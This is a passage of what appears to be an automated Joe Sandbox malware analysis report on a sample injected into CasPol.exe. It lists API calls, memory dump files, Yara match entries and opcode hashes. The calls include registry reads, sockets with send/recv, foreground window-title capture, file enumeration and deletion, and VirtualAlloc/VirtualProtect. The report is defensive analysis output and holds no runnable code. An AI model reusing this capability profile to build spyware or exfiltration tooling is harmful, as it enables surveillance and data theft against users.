• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• RegCloseKey.KERNEL32(00000000), ref: 0041269D
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
• RegCloseKey.KERNEL32(?), ref: 00412500
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
• RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: xAG
• API String ID: 176396367-2759412365
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10005126
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                  • Opcode ID: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                  • Instruction ID: 95843a031e05dac2a709eefcd5697d94da0e28df2c028df6d7444b4865a14f8d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B101B9322007445AF731CD4C988165FF3E9EBD12F5B760E1FE69197545D7736C4082A5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                                  • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044B9DF
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,00431FD7,00000000,0000000F,0042EA3D,?,?,00430AA6,?,00000000), ref: 0044BA1B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1482568997-0
                                                                                                                                                                                                                                  • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                                                                                                                                  • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,0040440B,00000000,00000000,00475B70), ref: 0041BC9E
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0040440B,0040440B,?,?,?,?,?,?,?,?,0040440B), ref: 0041BCC4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatFreeLocalMessage
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1427518018-0
                                                                                                                                                                                                                                  • Opcode ID: f72e3bc0a7bb61b5cd33225468eae17007f29defc5327e617253ce5263887c60
                                                                                                                                                                                                                                  • Instruction ID: 3eb85724c12076c4d2eca72925feb3a8121d4a7150c9d5d782cbd246f65a5107
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f72e3bc0a7bb61b5cd33225468eae17007f29defc5327e617253ce5263887c60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29F0C870B00105B6CF08A7A6DC4ADFF767DDB80305B10003FB502B21D1EE789E05D658
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateEventStartupsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1953588214-0
                                                                                                                                                                                                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                                                                                                                    • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,?,>C,00000000,00000000,?,?,?,?,?,?,00433E09,?,0046D5EC), ref: 00437C37
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3476068407-0

APIs
  • Part of subcall function 10019622: GetEnvironmentStringsW.KERNEL32 ref: 1001962B
  • Part of subcall function 10019622: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
  • Part of subcall function 10019622: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
  • Part of subcall function 10019622: _free.LIBCMT ref: 10019687
  • Part of subcall function 10019622: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
• _free.LIBCMT ref: 10015054
• _free.LIBCMT ref: 1001505B
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 400815659-0

APIs
• GetForegroundWindow.USER32 ref: 0041AC74
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0

APIs
• getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
• WSASetLastError.WS2_32(00000000), ref: 00413FC1
  • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
• String ID:
• API String ID: 1170566393-0

APIs
• VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

APIs
• RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                  • Instruction ID: def42a02582f0e9aca0d42380fcba57ce1fa30504e24a63dc847fc71142e9800
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE06535281221E6E721F6A69D85B4B3698DF416F2F6B0220ED149E490DB73DC8182E2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Startup
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                                                                                                                  • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                  • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                                                                                                                  • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                  • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                                                                                  • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                  • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Deallocate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1075933841-0
                                                                                                                                                                                                                                  • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                  • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 10007E20: FindFirstFileW.KERNEL32(?,?,?,00000000,75570F00), ref: 10007ED1
                                                                                                                                                                                                                                    • Part of subcall function 10007E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,75570F00), ref: 10007F0A
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 10007E03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2635277345-0
                                                                                                                                                                                                                                  • Opcode ID: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                  • Instruction ID: ba8769b27b28ad511b2499f2b98cea4f31d6ecccccff2d72c20009a19a29048a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AE08636F0125467A601D6AEDC8195BF3EDEB891A0B1100B6E90DD3301E871DD0142E1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
• Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
• Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
• Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
APIs
• SetEvent.KERNEL32(?), ref: 00406F28
• GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
• DeleteFileW.KERNEL32(00000000), ref: 00407018
  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
